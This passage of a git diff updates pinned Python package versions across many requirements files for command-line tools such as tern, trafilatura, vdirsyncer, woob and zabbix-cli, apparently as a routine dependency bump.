index a0d6a5e9..c4a257f4 100644
--- a/requirements/sysaidmin-requirements.txt
+++ b/requirements/sysaidmin-requirements.txt
@@ -1,14 +1,14 @@
 annotated-types==0.7.0
-anyio==4.4.0
+anyio==4.6.1
 distro==1.9.0
 h11==0.14.0
-httpcore==1.0.5
+httpcore==1.0.6
 httpx==0.27.2
-idna==3.8
-jiter==0.5.0
-openai==1.43.0
-pydantic==2.8.2
-pydantic-core==2.20.1
+idna==3.10
+jiter==0.6.1
+openai==1.51.2
+pydantic==2.9.2
+pydantic-core==2.23.4
 sniffio==1.3.1
 tqdm==4.66.5
 typing-extensions==4.12.2
diff --git a/requirements/tarsnapper-requirements.txt b/requirements/tarsnapper-requirements.txt
index a36c3920..c45022ce 100644
--- a/requirements/tarsnapper-requirements.txt
+++ b/requirements/tarsnapper-requirements.txt
@@ -1,5 +1,5 @@
 pexpect==4.9.0
 ptyprocess==0.7.0
 python-dateutil==2.9.0.post0
-pyyaml==6.0.1
+pyyaml==6.0.2
 six==1.16.0
diff --git a/requirements/tccutil-requirements.txt b/requirements/tccutil-requirements.txt
index 14666103..bcbe01ab 100644
--- a/requirements/tccutil-requirements.txt
+++ b/requirements/tccutil-requirements.txt
@@ -1 +1 @@
-packaging==24.0
+packaging==24.1
diff --git a/requirements/tern-requirements.txt b/requirements/tern-requirements.txt
index 16969850..fb06f4e6 100644
--- a/requirements/tern-requirements.txt
+++ b/requirements/tern-requirements.txt
@@ -13,12 +13,12 @@ packageurl-python==0.11.1
 packaging==23.2
 pbr==5.11.1
 prettytable==3.8.0
+pyyaml==6.0.2
 regex==2023.6.3
 requests==2.31.0
 setuptools==69.1.1
 smmap==5.0.0
 stevedore==5.1.0
-pyyaml==6.0.1
 urllib3==2.0.3
 wcwidth==0.2.6
 websocket-client==1.6.1
diff --git a/requirements/terraform-local-requirements.txt b/requirements/terraform-local-requirements.txt
index ed5a1006..6d9e8ea8 100644
--- a/requirements/terraform-local-requirements.txt
+++ b/requirements/terraform-local-requirements.txt
@@ -1,11 +1,11 @@
-boto3==1.35.23
-botocore==1.35.23
+boto3==1.35.39
+botocore==1.35.39
 jmespath==1.0.1
 lark==1.2.2
-localstack-client==2.6
+localstack-client==2.7
 packaging==24.1
 python-dateutil==2.9.0.post0
-python-hcl2==4.3.5
-s3transfer==0.10.2
+python-hcl2==5.0.0
+s3transfer==0.10.3
 six==1.16.0
 urllib3==2.2.3
diff --git a/requirements/tmuxp-requirements.txt b/requirements/tmuxp-requirements.txt
index 86875765..9071519d 100644
--- a/requirements/tmuxp-requirements.txt
+++ b/requirements/tmuxp-requirements.txt
@@ -1,3 +1,3 @@
 colorama==0.4.6
 libtmux==0.37.0
-pyyaml==6.0.1
+pyyaml==6.0.2
diff --git a/requirements/toot-requirements.txt b/requirements/toot-requirements.txt
index 649fbd85..6c3b99fd 100644
--- a/requirements/toot-requirements.txt
+++ b/requirements/toot-requirements.txt
@@ -1,5 +1,5 @@
 beautifulsoup4==4.12.3
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 idna==3.10
 requests==2.32.3
diff --git a/requirements/touca-requirements.txt b/requirements/touca-requirements.txt
index a717bc4f..c4a5956f 100644
--- a/requirements/touca-requirements.txt
+++ b/requirements/touca-requirements.txt
@@ -3,4 +3,4 @@ flatbuffers==23.5.26
 pygments==2.18.0
 rich==12.6.0
 touca-fbs==0.0.3
-urllib3==1.26.19
+urllib3==1.26.20
diff --git a/requirements/trafilatura-requirements.txt b/requirements/trafilatura-requirements.txt
index 8ecb8492..29a50508 100644
--- a/requirements/trafilatura-requirements.txt
+++ b/requirements/trafilatura-requirements.txt
@@ -1,15 +1,15 @@
 babel==2.16.0
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 courlan==1.3.1
 dateparser==1.2.0
-htmldate==1.9.0
+htmldate==1.9.1
 justext==3.0.1
 lxml==5.3.0
-lxml-html-clean==0.2.2
+lxml-html-clean==0.3.1
 python-dateutil==2.9.0.post0
-pytz==2024.1
-regex==2024.7.24
+pytz==2024.2
+regex==2024.9.11
 six==1.16.0
 tld==0.13
 tzlocal==5.2
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/tvnamer-requirements.txt b/requirements/tvnamer-requirements.txt
index cf953e6e..7483f093 100644
--- a/requirements/tvnamer-requirements.txt
+++ b/requirements/tvnamer-requirements.txt
@@ -1,6 +1,6 @@
-charset-normalizer==3.3.2
-idna==3.7
+charset-normalizer==3.4.0
+idna==3.10
 requests==2.32.3
 requests-cache==0.5.2
 tvdb-api==3.1.0
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/twarc-requirements.txt b/requirements/twarc-requirements.txt
index e4f5452c..576d4316 100644
--- a/requirements/twarc-requirements.txt
+++ b/requirements/twarc-requirements.txt
@@ -1,9 +1,9 @@
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 click-config-file==0.6.0
 click-plugins==1.1.1
 configobj==5.0.9
-humanize==4.10.0
+humanize==4.11.0
 idna==3.10
 oauthlib==3.2.2
 python-dateutil==2.9.0.post0
diff --git a/requirements/uhd-requirements.txt b/requirements/uhd-requirements.txt
index a0672e3f..5f289485 100644
--- a/requirements/uhd-requirements.txt
+++ b/requirements/uhd-requirements.txt
@@ -1,2 +1,2 @@
 mako==1.3.5
-markupsafe==2.1.5
+markupsafe==3.0.1
diff --git a/requirements/urlwatch-requirements.txt b/requirements/urlwatch-requirements.txt
index 525782c9..2a497280 100644
--- a/requirements/urlwatch-requirements.txt
+++ b/requirements/urlwatch-requirements.txt
@@ -1,14 +1,14 @@
 appdirs==1.4.4
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 cssselect==1.2.0
-idna==3.7
+idna==3.10
 jaraco-classes==3.4.0
-jaraco-context==5.3.0
-jaraco-functools==4.0.1
-keyring==25.2.1
-lxml==5.2.2
+jaraco-context==6.0.1
+jaraco-functools==4.1.0
+keyring==25.4.1
+lxml==5.3.0
 minidb==2.0.8
-more-itertools==10.3.0
-pyyaml==6.0.1
+more-itertools==10.5.0
+pyyaml==6.0.2
 requests==2.32.3
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/vdirsyncer-requirements.txt b/requirements/vdirsyncer-requirements.txt
index c33ca3d6..9acab85e 100644
--- a/requirements/vdirsyncer-requirements.txt
+++ b/requirements/vdirsyncer-requirements.txt
@@ -1,17 +1,18 @@
-aiohappyeyeballs==2.4.0
-aiohttp==3.10.5
+aiohappyeyeballs==2.4.3
+aiohttp==3.10.10
 aiohttp-oauthlib==0.1.0
 aiosignal==1.3.1
 aiostream==0.4.5
 atomicwrites==1.4.1
 attrs==24.2.0
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 click-log==0.4.0
 frozenlist==1.4.1
-idna==3.8
+idna==3.10
 multidict==6.1.0
 oauthlib==3.2.2
+propcache==0.2.0
 requests==2.32.3
-urllib3==2.2.2
-yarl==1.11.1
+urllib3==2.2.3
+yarl==1.15.1
diff --git a/requirements/vint-requirements.txt b/requirements/vint-requirements.txt
index 2b3e11ba..6bc7ba58 100644
--- a/requirements/vint-requirements.txt
+++ b/requirements/vint-requirements.txt
@@ -1,3 +1,3 @@
 ansicolor==0.3.2
 chardet==5.2.0
-pyyaml==6.0.1
+pyyaml==6.0.2
diff --git a/requirements/vit-requirements.txt b/requirements/vit-requirements.txt
index 4eaccae0..3c2cee6a 100644
--- a/requirements/vit-requirements.txt
+++ b/requirements/vit-requirements.txt
@@ -1,2 +1,4 @@
 tasklib==2.5.1
-urwid==2.2.2
+typing-extensions==4.12.2
+urwid==2.6.15
+wcwidth==0.2.13
diff --git a/requirements/volk-requirements.txt b/requirements/volk-requirements.txt
index 98decb7f..5f289485 100644
--- a/requirements/volk-requirements.txt
+++ b/requirements/volk-requirements.txt
@@ -1,2 +1,2 @@
-mako==1.3.2
-markupsafe==2.1.5
+mako==1.3.5
+markupsafe==3.0.1
diff --git a/requirements/vunnel-requirements.txt b/requirements/vunnel-requirements.txt
index 674a9b37..feb34f9a 100644
--- a/requirements/vunnel-requirements.txt
+++ b/requirements/vunnel-requirements.txt
@@ -1,4 +1,4 @@
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 click-default-group==1.2.4
 colorlog==6.8.2
@@ -13,7 +13,7 @@ iniconfig==2.0.0
 iso8601==2.1.0
 jinja2==3.1.4
 lxml==5.3.0
-markupsafe==2.1.5
+markupsafe==3.0.1
 mashumaro==3.13.1
 mergedeep==1.3.4
 orjson==3.10.7
@@ -26,7 +26,7 @@ pyyaml==6.0.2
 requests==2.32.3
 six==1.16.0
 sqlalchemy==1.4.54
-tomli==2.0.1
+tomli==2.0.2
 toposort==1.10
 typing-extensions==4.12.2
 untokenize==0.1.1
diff --git a/requirements/watson-requirements.txt b/requirements/watson-requirements.txt
index 123cb6fe..e124fb59 100644
--- a/requirements/watson-requirements.txt
+++ b/requirements/watson-requirements.txt
@@ -1,10 +1,10 @@
 arrow==1.3.0
-charset-normalizer==3.3.2
+charset-normalizer==3.4.0
 click==8.1.7
 click-didyoumean==0.3.1
-idna==3.7
+idna==3.10
 python-dateutil==2.9.0.post0
 requests==2.32.3
 six==1.16.0
-types-python-dateutil==2.9.0.20240316
-urllib3==2.2.2
+types-python-dateutil==2.9.0.20241003
+urllib3==2.2.3
diff --git a/requirements/woob-requirements.txt b/requirements/woob-requirements.txt
index d1296a0d..2e2cb0d8 100644
--- a/requirements/woob-requirements.txt
+++ b/requirements/woob-requirements.txt
@@ -1,17 +1,17 @@
-babel==2.15.0
-charset-normalizer==3.3.2
+babel==2.16.0
+charset-normalizer==3.4.0
 html2text==2024.2.26
-idna==3.7
-lxml==5.2.2
+idna==3.10
+lxml==5.3.0
 markdown-it-py==3.0.0
 mdurl==0.1.2
 packaging==23.2
 pycountry==24.6.1
 pygments==2.18.0
 python-dateutil==2.9.0.post0
-pyyaml==6.0.1
+pyyaml==6.0.2
 requests==2.32.3
-rich==13.7.1
+rich==13.9.2
 six==1.16.0
 unidecode==1.3.8
-urllib3==2.2.2
+urllib3==2.2.3
diff --git a/requirements/zabbix-cli-requirements.txt b/requirements/zabbix-cli-requirements.txt
index 15ed489f..9b1e4b1b 100644
--- a/requirements/zabbix-cli-requirements.txt
+++ b/requirements/zabbix-cli-requirements.txt
@@ -1,9 +1,9 @@
 annotated-types==0.7.0
-anyio==4.6.0
+anyio==4.6.1
 click==8.1.7
 click-repl==0.2.0
 h11==0.14.0
-httpcore==1.0.5
+httpcore==1.0.6
 httpx==0.27.2
 idna==3.10
 markdown-it-py==3.0.0
@@ -14,14 +14,14 @@ prompt-toolkit==3.0.48
 pydantic==2.9.2
 pydantic-core==2.23.4
 Pygments==2.18.0
-rich==13.9.0
+rich==13.9.2
 shellingham==1.5.4
 six==1.16.0
 sniffio==1.3.1
 socksio==1.0.0
 StrEnum==0.4.15
-tomli==2.0.1
-tomli-w==1.0.0
+tomli==2.0.2
+tomli-w==1.1.0
 typer==0.12.5
 typing-extensions==4.12.2
 wcwidth==0.2.13